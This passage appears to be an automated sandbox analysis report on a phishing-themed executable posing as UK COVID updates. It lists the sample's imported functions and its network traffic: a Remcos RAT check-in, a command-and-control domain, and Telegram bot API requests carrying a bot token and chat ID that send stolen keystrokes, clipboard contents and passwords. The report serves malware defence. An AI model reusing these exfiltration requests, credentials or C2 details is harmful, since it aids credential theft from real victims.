Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040BEA2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU? 28_2_0040BEA2
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00402C45 _EH_prolog,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hs 28_2_00402C45
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040BC9B ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 28_2_0040BC9B
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00403183 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$all 28_2_00403183
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040F234 SetFileAttributesA,FindFirstFileA,FindNextFileA,RemoveDirectoryA,SetFileAttributesA,DeleteFileA,GetLastError,FindClose,RemoveDirectoryA,FindClose, 28_2_0040F234
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00405AFB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_00405AFB
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_004057B6 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_004057B6

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2025637 ET TROJAN Remcos RAT Checkin 23 192.168.2.5:49777 -> 91.193.75.202:40401
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe DNS query: name: checkip.dyndns.org
Source: C:\Users\user\AppData\Local\Temp\dwnl.exe DNS query: name: checkip.dyndns.org
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: tobi12345.hopto.org
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.app
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.app
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768030b76e62Host: api.telegram.orgContent-Length: 749Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Clipboard%20Logger%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680311208c1Host: api.telegram.orgContent-Length: 749
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680313f54cfHost: api.telegram.orgContent-Length: 833
Source: global traffic HTTP traffic detected: POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20keystroke%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768031657ce9Host: api.telegram.orgContent-Length: 749
